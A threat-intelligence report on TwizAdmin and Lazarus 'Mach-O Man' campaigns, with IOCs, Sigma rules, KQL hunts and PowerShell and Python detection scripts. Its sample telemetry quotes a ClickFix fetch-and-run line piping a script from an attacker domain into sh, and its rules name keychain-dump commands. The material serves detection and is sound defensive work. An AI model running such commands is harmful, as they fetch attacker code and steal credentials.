Analysis of recent OTX pulses highlights a convergence of multi-platform threats targeting enterprise credentials and financial assets. The intelligence landscape is dominated by the emergence of the TwizAdmin Malware-as-a-Service (MaaS) operation, which offers an "all-in-one" commodity toolkit combining crypto-clipping, infostealing, and a ransomware module tracked as crpx0. In parallel, the Lazarus Group is deploying a newly identified macOS malware kit, "Mach-O Man," against the Finance and Technology sectors via social engineering.
The shared objective of these campaigns is financial gain through the systematic theft of cryptocurrency (via clipboard hijacking and seed phrase extraction), browser credentials, and session cookies. TwizAdmin is a broad, high-volume threat distributed through logistics-themed lures (FedEx); Lazarus uses a narrowly targeted ClickFix attack chain that relies on fraudulent collaboration platforms to get victims to run the macOS payload themselves. Both campaigns rely on obfuscated delivery mechanisms and establish persistent C2 channels for data exfiltration.
Threat Actor / Malware Profile
TwizAdmin (MaaS Operation)
- Adversary: DataBreachPlus
- Malware Families: TwizAdmin, crpx0 (Ransomware)
- Distribution Method: Phishing campaigns impersonating logistics entities (e.g., FedEx) delivering multi-stage payloads targeting Windows and macOS.
- Payload Behavior:
- Crypto-Clipper: Hijacks clipboard to replace wallet addresses across eight blockchain networks.
- Infostealer: Exfiltrates browser credentials, cookies, and BIP-39 seed phrases.
- Ransomware: Deploys the 'crpx0' ransomware module.
- Java RAT: Includes a Remote Access Trojan builder managed via a FastAPI-based C2 panel.
- C2 Communication: Communicates with exposed C2 panels (e.g., 103.241.66[.]238:1337) built on FastAPI; operator access to the panel is gated by a license key system.
- Persistence Mechanism: Not explicitly detailed in the pulse. Given the Windows/macOS targeting, standard methods such as scheduled tasks or Run keys (Windows) and LaunchAgents (macOS) are the likely candidates and the first places to check during triage.
- Anti-Analysis: Nothing beyond the license-keyed FastAPI panel is described in the pulse. That panel is an operational-security control limiting who can reach the C2 rather than an anti-analysis feature of the payload, so do not assume from it that the samples are packed or unpacked either way.
Lazarus Group (Mach-O Man Campaign)
- Adversary: Lazarus Group (APT38)
- Malware Families: Mach-O Man, PyLangGhostRAT
- Distribution Method: ClickFix attacks initiated via fake meeting invitations on Telegram, redirecting to fraudulent collaboration sites impersonating Zoom, Microsoft Teams, or Google Meet. Victims are tricked into executing terminal commands.
- Payload Behavior:
- Mach-O Man: A newly identified macOS malware kit responsible for initial infection and payload delivery.
- PyLangGhostRAT: A Python-based Remote Access Trojan for C2 and data exfiltration.
- Credential Theft: Specifically targets browser-stored credentials for theft.
- C2 Communication: Uses Telegram for exfiltration, a technique increasingly common for blending in with legitimate traffic and avoiding traditional network detection.
- Persistence Mechanism: Likely uses macOS persistence mechanisms such as LaunchAgents or LaunchDaemons, though specific details are not in the pulse.
- Anti-Analysis: ClickFix technique is inherently social-engineering focused, bypassing technical defenses by manipulating the user. The use of macOS may also provide a degree of evasion against traditional Windows-focused security stacks.
Middle East Malicious Infrastructure (Eagle Werewolf, ENERGETIC BEAR, etc.)
- Adversaries: Eagle Werewolf, ENERGETIC BEAR, Velvet Tempest, APT28, GrayCharlie
- Malware Families: Phorpiex, Twizt, XMRig, LockBit Black, EchoGather, Sliver, SoullessRAT, AquilaRAT, DYNOWIPER, RondoDox, Mirai, Phexia, HellsUchecker, Termite, NetSupport RAT, Tactical RMM, Keitaro, AsyncRAT, Cobalt Strike, Hajime, Mozi, Acunetix, Gophish, Prism X
- Distribution Method: N/A (Infrastructure report)
- Payload Behavior: Diverse, ranging from crypto-mining (XMRig) and ransomware (LockBit Black) to RATs (Sliver, AsyncRAT) and wipers (DYNOWIPER).
- C2 Communication: 1,350+ active C2 servers identified across 98 providers in 14 Middle Eastern countries. A significant portion (96.8%) of detected activity is C2 communication.
- Persistence Mechanism: Varies widely across the numerous malware families.
- Anti-Analysis: Use of bulletproof hosting and widespread infrastructure makes takedown and detection difficult.
IOC Analysis
The provided indicators offer a multi-faceted view of the threat landscape:
- Domains (fanonlyatn.xyz, livemicrosft.com): These are used for initial payload distribution (TwizAdmin) and as part of the ClickFix redirect chain (Lazarus). SOC teams should block these domains at the perimeter (DNS sinkhole, proxy) and investigate any historical DNS queries or HTTP connections to them. The livemicrosft.com domain is a textbook typosquat of the Microsoft brand, consistent with the Microsoft Teams variant of the ClickFix lure.
- FileHash-SHA256: 20+ unique hashes are provided, representing droppers, loaders, and core payloads for TwizAdmin, crpx0, and Mach-O Man. Operationalize them in EDR to block execution or alert on file creation. Note that the Mach-O Man hashes will only be observed on macOS hosts (or on file shares), while the TwizAdmin and crpx0 hashes apply to Windows. The number of distinct hashes points to a rapidly rebuilt toolset, so hash-based blocks will age quickly and should be paired with behavioural detections.
- IPv4 Addresses (e.g., 37.32.15.8, 197.51.170.131): These IPs, mapped to C2 servers across the Middle East, are critical for network-level detection. Add them to firewall blocklists and hunt for existing beaconing in NetFlow or firewall logs. The concentration of C2 IPs attributed to Saudi Arabia's STC (e.g., 93.113.62.247) is a notable finding.
- CVE (CVE-2025-11953): The pulse gives no details on the affected product or how the vulnerability is used. Its presence suggests exploitation as a potential initial access or lateral movement vector; confirm the affected product against your asset inventory and prioritize patching if it is present.
SOC teams should use a combination of automated tools (SIEM, EDR, TIP) to ingest these IOCs. EDRs can be configured to block files by hash, while firewalls and proxies can block IP and domain indicators. A Threat Intelligence Platform (TIP) is ideal for correlating these IOCs with internal telemetry and identifying potentially compromised systems.
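To make the ingest-and-hunt step concrete, the following is an added example written for this write-up (not code from the pulses or from any TIP). It refangs indicators exactly as they are pasted from a pulse, classifies each as an IP or domain (keeping the port when one is given, as with the 103.241.66[.]238:1337 panel), and sweeps them across DNS, proxy and firewall log lines with label-boundary matching so that a near-miss domain is not flagged. The indicator values are the ones quoted above; the log lines and their field layout are constructed for the demo.

```python
"""Normalise defanged pulse indicators and sweep them across DNS, proxy and firewall log lines.

Added example for this page; not code from the OTX pulses or from any TIP. The indicator
values are the ones quoted in the text; the log lines below are constructed for the demo.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Indicators as an analyst would paste them from the pulse: defanged, one with a port.
RAW_IOCS = [
    "fanonlyatn.xyz",
    "livemicrosft.com",
    "103.241.66[.]238:1337",   # TwizAdmin FastAPI panel
    "37.32.15.8",
    "197.51.170.131",
    "93.113.62.247",
]

# Constructed log lines (not real telemetry) covering three common source formats.
SAMPLE_LOGS = [
    "2026-05-24T10:01:02Z dns client=10.0.0.15 query=www.fanonlyatn.xyz type=A",
    "2026-05-24T10:01:05Z proxy client=10.0.0.15 dst=103.241.66.238:1337 method=POST url=http://103.241.66.238:1337/api/beacon",
    "2026-05-24T10:02:00Z fw src=10.0.0.22 dst=37.32.15.8 dport=443 action=allow",
    "2026-05-24T10:02:30Z dns client=10.0.0.31 query=notlivemicrosft.com type=A",
    "2026-05-24T10:03:00Z dns client=10.0.0.31 query=www.microsoft.com type=A",
]


@dataclass(frozen=True)
class Ioc:
    kind: str                   # "ip" or "domain"
    value: str                  # refanged and lower-cased
    port: Optional[int] = None  # only set when the source gave host:port


def refang(value: str) -> str:
    """Undo the usual defanging ([.] (.) [dot] [:] hxxp) so the value compares with real logs."""
    v = value.strip()
    v = re.sub(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]|\(dot\)", ".", v, flags=re.IGNORECASE)
    v = re.sub(r"\[:\]", ":", v)
    v = re.sub(r"^hxxp", "http", v, flags=re.IGNORECASE)
    return v


def parse_ioc(raw: str) -> Ioc:
    """Classify a refanged indicator; URLs are reduced to their host[:port] part."""
    v = refang(raw)
    if "://" in v:
        v = v.split("://", 1)[1].split("/", 1)[0]
    port = None
    m = re.fullmatch(r"(.+?):(\d{1,5})", v)     # IPv4/hostname with a port; IPv6 literals not handled
    if m:
        v, port = m.group(1), int(m.group(2))
    try:
        ipaddress.ip_address(v)
        return Ioc("ip", v, port)
    except ValueError:
        return Ioc("domain", v.lower().rstrip("."), port)


IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?\b")
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)


def domain_hit(token: str, ioc: Ioc) -> bool:
    """Exact or subdomain match on a label boundary: www.livemicrosft.com hits, notlivemicrosft.com does not."""
    token = token.lower().rstrip(".")
    return token == ioc.value or token.endswith("." + ioc.value)


def sweep(lines: Iterable[str], iocs: List[Ioc]) -> List[Dict[str, object]]:
    """One hit per (line, indicator); port_match is True when the logged port equals the IOC's port."""
    hits: List[Dict[str, object]] = []
    seen = set()
    for n, line in enumerate(lines, 1):
        for ip, port in IP_RE.findall(line):
            for ioc in iocs:
                if ioc.kind == "ip" and ioc.value == ip and (n, ioc.value) not in seen:
                    seen.add((n, ioc.value))
                    hits.append({"line": n, "ioc": ioc.value, "token": ip,
                                 "port_match": bool(ioc.port and port and int(port) == ioc.port)})
        for host in HOST_RE.findall(line):
            for ioc in iocs:
                if ioc.kind == "domain" and domain_hit(host, ioc) and (n, ioc.value) not in seen:
                    seen.add((n, ioc.value))
                    hits.append({"line": n, "ioc": ioc.value, "token": host, "port_match": False})
    return hits


if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOGS, [parse_ioc(r) for r in RAW_IOCS]):
        print(hit)
```

The port is kept on the indicator but not required for a match: a beacon to the panel IP on another port is still worth a look, and the port_match flag lets the analyst rank the hits that line up exactly with the pulse.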
Detection Engineering
Sigma Rules
title: Potential TwizAdmin C2 Activity
id: 9c84e2e6-1b1a-4b0e-a9a6-7d9f9a9c9e9d
description: Detects network connections to known TwizAdmin infrastructure, either the exposed FastAPI C2 panel (IP and port 1337 together) or the payload distribution domain reported in the pulse. The two are separate selections so that a hit on either fires; requiring port 1337 and the domain in one selection would match neither.
author: Security Arsenal
date: 2026/05/24
modified: 2026/05/24
references:
  - https://otx.alienvault.com/pulse/664fb7e7744e1b6475bc6653
tags:
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: network_connection
detection:
  selection_panel:
    DestinationIp: '103.241.66.238'
    DestinationPort: 1337
  selection_domain:
    DestinationHostname|endswith: 'fanonlyatn.xyz'
  condition: 1 of selection_*
falsepositives:
  - Unlikely; no legitimate traffic to this panel IP and port or to this domain is expected.
level: high
---
title: Suspicious Download Command Spawned from an Interactive macOS Shell (ClickFix)
id: 8f7d1a2b-3c4e-5f6a-7b8c-9d0e1f2a3b4c
description: Detects curl/wget/base64 or a shell one-liner launched from an interactive shell on macOS, which is how a pasted ClickFix command surfaces in process_creation telemetry before Mach-O Man is dropped. Terminal.app itself never carries the pasted text; it launches login, which launches zsh, and the victim's "curl ... | sh" appears as a curl process and a bare sh process whose parent is that zsh. The pipe is not visible in either child's command line, so this rule matches the download half and accepts either the shell or Terminal.app as the parent; pin the ancestry to Terminal.app where your EDR exposes the grandparent process.
author: Security Arsenal
date: 2026/05/24
modified: 2026/05/24
references:
  - https://otx.alienvault.com/pulse/664fb7e7744e1b6475bc6654
tags:
  - attack.execution
  - attack.t1059.004
  - attack.t1204.004
logsource:
  product: macos
  category: process_creation
detection:
  selection_parent:
    ParentImage|endswith:
      - '/zsh'
      - '/bash'
      - '/sh'
      - '/Terminal.app/Contents/MacOS/Terminal'
  selection_image:
    Image|endswith:
      - '/curl'
      - '/wget'
      - '/base64'
      - '/bash'
      - '/sh'
      - '/zsh'
  selection_cmd:
    CommandLine|contains:
      - 'curl '
      - 'wget '
      - 'bash -c'
      - 'sh -c'
      - 'base64 -d'
      - 'base64 --decode'
  condition: all of selection_*
falsepositives:
  - Administrators and developers pasting curl-based installers into a terminal. Do not tune this out by parent application (iTerm2, the VS Code terminal and Terminal.app are equally usable by a victim); tune by account, by destination domain, or by correlating the download with a bare sh/bash sibling spawned by the same shell within a couple of seconds.
level: medium
---
title: Browser Credential Store Read by Non-Browser Process (TwizAdmin & Mach-O Man)
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects reads of Chrome's "Login Data" and "Cookies" SQLite databases by a process other than the browser itself, the common step in the TwizAdmin infostealer and the Mach-O Man/PyLangGhostRAT chain. Requires an EDR that reports file reads (Sysmon file access on Windows, Endpoint Security file events on macOS). Other Chromium-based browsers use the same file names under their own profile directories and can be added with the same pattern.
author: Security Arsenal
date: 2026/05/24
modified: 2026/05/24
references:
  - https://otx.alienvault.com/pulse/664fb7e7744e1b6475bc6653
  - https://otx.alienvault.com/pulse/664fb7e7744e1b6475bc6654
tags:
  - attack.credential_access
  - attack.t1555.003
logsource:
  category: file_access
detection:
  selection_win:
    TargetFilename|contains: '\Google\Chrome\User Data\'
    TargetFilename|endswith:
      - '\Login Data'
      - '\Cookies'
  selection_mac:
    TargetFilename|contains: '/Library/Application Support/Google/Chrome/'
    TargetFilename|endswith:
      - '/Login Data'
      - '/Cookies'
  filter_browser:
    Image|endswith:
      - '\chrome.exe'
      - '/Google Chrome.app/Contents/MacOS/Google Chrome'
  condition: 1 of selection_* and not filter_browser
falsepositives:
  - Backup agents, password-manager import tools and forensic collectors; add them to the filter by full image path, not by name.
level: high
---
title: macOS Keychain Credential Dump via security Utility
id: 2c6e9d4a-8b1f-4f73-9e5a-0d3c7b2a6f18
description: Detects the security command-line tool dumping or enumerating keychain items. On macOS the browser's "Login Data" database is encrypted with a key held in the login keychain (Chrome's "Chrome Safe Storage" item), so a stealer that copies the database typically also queries the keychain; that pairing is what to look for alongside the file-access rule above.
author: Security Arsenal
date: 2026/05/24
modified: 2026/05/24
references:
  - https://otx.alienvault.com/pulse/664fb7e7744e1b6475bc6654
tags:
  - attack.credential_access
  - attack.t1555.001
logsource:
  product: macos
  category: process_creation
detection:
  selection:
    Image|endswith: '/usr/bin/security'
    CommandLine|contains:
      - 'dump-keychain'
      - 'find-generic-password'
      - 'find-internet-password'
  condition: selection
falsepositives:
  - MDM agents and admin scripts that look up a single item with find-generic-password; scope by parent process or by the -s service name being queried.
level: high
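The ClickFix rules above match strings in individual process events, which cannot see the relationship that actually distinguishes a pasted lure from a developer's curl: the shell forks the download and a bare interpreter together. The following is an added example written for this page (not code from the pulses or from any EDR vendor) that scores constructed macOS process_creation events by walking the process tree. The image paths for Terminal.app and iTerm2, the pids, timestamps and the URL path in the sample are assumptions for the demo; livemicrosft.com is the typosquat domain from the pulse.

```python
"""Process-tree scoring for macOS ClickFix delivery, run over constructed process events.

Added example for this page, not code from the OTX pulses or from any EDR. It models the
process_creation telemetry an EDR emits: the victim's `curl ... | sh` surfaces as two children
of the interactive zsh, and neither child's argv contains the pipe.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    ts: float       # seconds since the start of the capture
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


# Assumed image paths for the two common terminal emulators.
TERMINAL_APPS = ("/Terminal.app/Contents/MacOS/Terminal", "/iTerm.app/Contents/MacOS/iTerm2")
INTERACTIVE_SHELLS = ("/zsh", "/bash", "/sh")
INTERPRETERS = ("/sh", "/bash", "/zsh", "/python3", "/osascript")
# A fetch from a URL, or a base64 decode: the two usual halves of a ClickFix one-liner.
DOWNLOAD_CMD = re.compile(r"\b(?:curl|wget)\b.*\b(?:https?|ftp)://|\bbase64\b.*(?:-d\b|--decode)", re.I)
PIPE_WINDOW_S = 2.0   # the shell forks both sides of a pipe at once


class ProcessTree:
    def __init__(self, events: List[ProcEvent]) -> None:
        self.by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
        self.children: Dict[int, List[ProcEvent]] = defaultdict(list)
        for e in events:
            self.children[e.ppid].append(e)

    def parent(self, pid: int) -> Optional[ProcEvent]:
        e = self.by_pid.get(pid)
        return self.by_pid.get(e.ppid) if e else None

    def ancestors(self, pid: int) -> List[ProcEvent]:
        """Walk ppid links towards the root; the seen-set guards against pid reuse forming a cycle."""
        out, seen = [], {pid}
        p = self.parent(pid)
        while p and p.pid not in seen:
            out.append(p)
            seen.add(p.pid)
            p = self.parent(p.pid)
        return out


def score(event: ProcEvent, tree: ProcessTree) -> Optional[str]:
    """Return 'high', 'medium' or None for one process_creation event."""
    if not DOWNLOAD_CMD.search(event.cmdline):
        return None
    parent = tree.parent(event.pid)
    if parent is None or not parent.image.endswith(INTERACTIVE_SHELLS):
        return None
    if not any(a.image.endswith(TERMINAL_APPS) for a in tree.ancestors(event.pid)):
        return None  # launchd, cron and SSH sessions are out of scope for a paste-driven lure
    # A bare interpreter (no script argument) forked by the same shell within the window is
    # the `| sh` of the lure. A developer fetching an API with curl has no such sibling.
    for sib in tree.children[parent.pid]:
        if (sib.pid != event.pid and sib.image.endswith(INTERPRETERS)
                and len(sib.cmdline.split()) == 1 and abs(sib.ts - event.ts) <= PIPE_WINDOW_S):
            return "high"
    return "medium"


def run(events: List[ProcEvent]) -> Dict[int, str]:
    """Score every event; returns {pid: level} for the ones worth an alert."""
    tree = ProcessTree(events)
    out: Dict[int, str] = {}
    for e in events:
        level = score(e, tree)
        if level:
            out[e.pid] = level
    return out


# Constructed telemetry (pids, timestamps, paths and the URL path are made up for the demo).
SAMPLE_EVENTS = [
    ProcEvent(0.0, 300, 1, "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "Terminal"),
    ProcEvent(0.1, 310, 300, "/usr/bin/login", "login -pf alice"),
    ProcEvent(0.2, 311, 310, "/bin/zsh", "-zsh"),
    # victim pastes the lure: curl -fsSL http://livemicrosft.com/meet/fix.sh | sh
    ProcEvent(45.0, 320, 311, "/usr/bin/curl", "curl -fsSL http://livemicrosft.com/meet/fix.sh"),
    ProcEvent(45.0, 321, 311, "/bin/sh", "sh"),
    # developer in iTerm2 querying an API: same parent shape, no interpreter sibling
    ProcEvent(0.0, 400, 1, "/Applications/iTerm.app/Contents/MacOS/iTerm2", "iTerm2"),
    ProcEvent(0.3, 410, 400, "/bin/zsh", "-zsh"),
    ProcEvent(80.0, 420, 410, "/usr/bin/curl", "curl -sS https://api.example.com/v1/status"),
    # launchd job fetching a feed: no terminal ancestry, so out of scope
    ProcEvent(90.0, 500, 1, "/bin/sh", "sh -c /usr/local/bin/update.sh"),
    ProcEvent(90.1, 501, 500, "/usr/bin/curl", "curl -fsSL https://updates.example.com/feed"),
]

if __name__ == "__main__":
    for pid, level in run(SAMPLE_EVENTS).items():
        print(pid, level, SAMPLE_EVENTS[[e.pid for e in SAMPLE_EVENTS].index(pid)].cmdline)
```

The pairing check is what lets the iTerm2 curl stay at medium while the Terminal-spawned curl with a bare sh sibling goes to high; excluding iTerm2 or VS Code by parent, as the simpler string rule does, would instead blind the detection to a victim who happens to use those terminals.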
KQL (Microsoft Sentinel)
This KQL query hunts for network connections to the C2 IP addresses and domains mentioned in the pulses.
let KnownDomains = dynamic(["fanonlyatn.xyz", "livemicrosft.com"]);
let C2IPs = dynamic(["103.241.66.238", "37.32.15.8", "197.51.170.131", "5.109.182.231", "93.113.62.247", "94.252.245.193"]);
DeviceNetworkEvents
| where Timestamp >= ago(30d)
// has_any finds the domain inside a full RemoteUrl (scheme, subdomain, path); in~ would only hit an exact string
| where RemoteUrl has_any (KnownDomains) or RemoteIP in (C2IPs)
| extend IoCType = iff(RemoteUrl has_any (KnownDomains), "Domain", "IP")
| project Timestamp, DeviceName, InitiatingProcessAccountName, IoCType, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
This KQL query hunts for the ClickFix execution step on macOS. The pasted one-liner is run by the interactive shell, so the curl and sh processes have zsh (or bash) as their initiating process and Terminal.app one level further up; Terminal itself never appears as the initiating process of the download. The query therefore keys on the shell ancestry and does not exclude iTerm2 or the VS Code terminal, which a victim can use just as easily; tune by account or destination instead.
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where FolderPath startswith "/"                                   // Unix-style path: macOS (and Linux) hosts
| where FileName in~ ("curl", "wget", "base64", "sh", "bash", "zsh")
| where ProcessCommandLine has_any ("curl", "wget", "bash -c", "sh -c", "base64")
// the pasted one-liner runs from the interactive shell; Terminal.app only appears one level up
| where InitiatingProcessFileName in~ ("zsh", "bash", "sh") or InitiatingProcessParentFileName =~ "Terminal"
| project Timestamp, DeviceName, AccountName, InitiatingProcessParentFileName, InitiatingProcessFileName, FileName, ProcessCommandLine
| order by Timestamp desc
PowerShell Hunt Script
This PowerShell script checks Windows endpoints for files matching the SHA-256 hashes from the pulses. Run it elevated (so protected directories are readable) as part of an incident response investigation; it reports and records matches but does not quarantine them.
# Known malicious SHA256 hashes from the OTX pulses. A HashSet gives O(1) lookups and the
# comparer makes the match case-insensitive regardless of how the hashes were pasted.
$MaliciousHashes = [System.Collections.Generic.HashSet[string]]::new(
    [string[]]@(
        "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
        "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
        "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
        "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
        "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec",
        "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
        "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
        "4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b",
        "85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c",
        "871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3",
        "89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938",
        "a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614"
    ),
    [System.StringComparer]::OrdinalIgnoreCase
)

# "C:" alone means the current directory on that drive; "C:\" is the drive root.
$DrivesToScan = @("C:\")
$MatchesFound = [System.Collections.Generic.List[object]]::new()
$Sha256 = [System.Security.Cryptography.SHA256]::Create()

Write-Host "[+] Scanning for known malicious file hashes..." -ForegroundColor Cyan
foreach ($Drive in $DrivesToScan) {
    Write-Host "[+] Scanning drive $Drive ..." -ForegroundColor Yellow
    # Stream files through the pipeline rather than collecting them first; -Force includes hidden files.
    # A full-drive walk is slow: in production scope to user profiles, Temp, Downloads and ProgramData,
    # or feed a pre-indexed file list.
    Get-ChildItem -Path $Drive -Recurse -File -Force -ErrorAction SilentlyContinue | ForEach-Object {
        $File = $_
        $FileStream = $null
        try {
            $FileStream = $File.OpenRead()
            $FileHash = [System.BitConverter]::ToString($Sha256.ComputeHash($FileStream)).Replace("-", "")
            if ($MaliciousHashes.Contains($FileHash)) {
                $MatchesFound.Add([PSCustomObject]@{
                    FilePath     = $File.FullName
                    Hash         = $FileHash.ToLowerInvariant()
                    SizeBytes    = $File.Length
                    LastWriteUtc = $File.LastWriteTimeUtc
                })
            }
        }
        catch {
            # Locked, in-use or otherwise unreadable files are skipped; log them if completeness matters.
        }
        finally {
            if ($null -ne $FileStream) { $FileStream.Dispose() }
        }
    }
}
$Sha256.Dispose()

if ($MatchesFound.Count -gt 0) {
    Write-Host "[!] ALERT: Found files matching known malicious hashes:" -ForegroundColor Red
    $MatchesFound | Format-Table -AutoSize
    # Preserve the evidence before any containment action touches the host.
    $MatchesFound | Export-Csv -Path "$env:TEMP\ioc-hash-matches.csv" -NoTypeInformation
} else {
    Write-Host "[+] No files matching the known malicious hashes were found." -ForegroundColor Green
}
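The Mach-O Man hashes will only ever turn up on macOS hosts, which the PowerShell script does not cover. The following is an added example written for this page (not tooling from the pulses) that performs the same hash sweep on macOS or Linux with python3: it streams files in fixed-size chunks, refuses to follow symlinks (so a loop or a /Volumes network mount cannot derail it), skips unreadable and oversized files, and includes a self-check that builds a temporary directory of constructed files. The hash set is the SHA-256 list from the pulses; the default scan roots, the size cap and the demo file names are this script's own assumptions.

```python
"""Hash sweep for the pulse indicators on macOS and Linux endpoints.

Added example for this page (the PowerShell script covers Windows); not tooling from the OTX
pulses. The hash set is the SHA-256 list from the pulses; scan roots, size cap and the demo's
file names are assumptions for the example.
"""
import hashlib
import os
import stat
import sys
import tempfile
from typing import Dict, FrozenSet, Iterator, List, Optional

MALICIOUS_SHA256: FrozenSet[str] = frozenset({
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
    "4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b",
    "85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c",
    "871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3",
    "89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938",
    "a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614",
})

CHUNK_BYTES = 1 << 20        # 1 MiB reads keep memory flat on large files
MAX_FILE_BYTES = 512 << 20   # droppers and loaders are small; skip disk images and VM files
DEFAULT_ROOTS = ["/Users", "/Applications", "/tmp", "/private/var/tmp"]  # macOS; pass roots on the CLI to override


def sha256_file(path: str) -> Optional[str]:
    """Lower-case SHA-256 of a file, or None when it cannot be read (permissions, vanished, special file)."""
    h = hashlib.sha256()
    try:
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(CHUNK_BYTES), b""):
                h.update(chunk)
    except OSError:
        return None
    return h.hexdigest()


def iter_regular_files(root: str, max_bytes: int = MAX_FILE_BYTES) -> Iterator[str]:
    """Yield regular files under root without following symlinks (no loops, no network mounts)."""
    for dirpath, _dirs, files in os.walk(root, followlinks=False, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_size <= max_bytes:
                yield path


def sweep(root: str, iocs: FrozenSet[str] = MALICIOUS_SHA256) -> List[Dict[str, object]]:
    """Hash every candidate file under root and return those whose digest is in the IOC set."""
    matches: List[Dict[str, object]] = []
    for path in iter_regular_files(root):
        digest = sha256_file(path)
        if digest in iocs:
            st = os.lstat(path)
            matches.append({"path": path, "sha256": digest, "size": st.st_size, "mtime": st.st_mtime})
    return matches


def demo_sweep() -> Dict[str, object]:
    """Self-check on a temporary directory of constructed files (no real samples involved)."""
    with tempfile.TemporaryDirectory() as d:
        sample = os.path.join(d, "FedEx_Invoice.bin")   # stand-in for a dropper; content is made up
        with open(sample, "wb") as f:
            f.write(b"constructed stand-in for a TwizAdmin dropper\n")
        with open(os.path.join(d, "notes.txt"), "wb") as f:
            f.write(b"hello\n")
        try:
            os.symlink(d, os.path.join(d, "loop"))     # the walker must not recurse into this
        except OSError:
            pass                                        # symlink creation may be unavailable
        iocs = MALICIOUS_SHA256 | {sha256_file(sample)}
        hits = sweep(d, iocs)
        return {
            "hits": len(hits),
            "names": sorted(os.path.basename(h["path"]) for h in hits),
            "benign_sha256": sha256_file(os.path.join(d, "notes.txt")),
        }


if __name__ == "__main__":
    roots = sys.argv[1:] or DEFAULT_ROOTS
    found = [m for r in roots if os.path.isdir(r) for m in sweep(r)]
    for m in found:
        print(f"[!] {m['sha256']}  {m['size']:>10}  {m['path']}")
    print(f"[+] {len(found)} matching file(s)" if found else "[+] No matching files found")
```

Run it as root so user Library folders and /private/var are readable, and pass explicit roots (for example a single user's Downloads directory) when triaging a host interactively; the full default walk is meant for a scheduled sweep, not for a console session.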
Response Priorities
Immediate
- Block IOCs: Immediately block all domains (fanonlyatn.xyz, livemicrosft.com), IP addresses, and file hashes at the network perimeter (DNS, firewall, proxy) and on endpoints (EDR). Prioritize these blocks for high-value assets in the Finance and Technology sectors.
- Hunt for Execution Artifacts: Run the PowerShell hunt script on Windows endpoints and the Sentinel KQL queries across the estate to identify systems that may already be compromised. Focus on download commands spawned from interactive shells on macOS and unexpected process creation on Windows.
24h
- Credential Auditing: Given the infostealing focus of TwizAdmin and Mach-O Man, initiate a forced password reset and MFA re-enrollment for all users, prioritizing those with access to financial systems and cryptocurrency wallets. Because both campaigns also take session cookies, a password reset alone does not evict the attacker: revoke active sessions and refresh tokens for affected identities (for example in Entra ID or Google Workspace) so that stolen cookies stop working. Review browser password manager logs for suspicious export or access activity, and treat any wallet whose seed phrase was stored on an affected host as compromised.
- Infrastructure Investigation: For organizations with a presence in the Middle East or with telecommunications providers (like STC) in their supply chain, investigate any network logs for connections to the identified C2 IP ranges. Correlate this with any alerts from the "Middle East Malicious Infrastructure" pulse.
1 Week
- Security Awareness: Conduct a refresher focused on the two lures seen here: unexpected package-delivery notices (TwizAdmin) and meeting invitations that ask the recipient to paste a command into Terminal to "fix" a call (ClickFix). Make the point explicit that no legitimate meeting platform requires running a terminal command.
- Endpoint Security Review: Ensure EDR policies are configured to detect and block execution from non-standard directories, suspicious script interpreters (PowerShell, Bash), and unauthorized browser extensions. Review and harden macOS endpoint detection and response (EDR) coverage.
- Vulnerability Management: Investigate CVE-2025-11953 further, assess its impact on the environment, and expedite patching if the affected product is in use.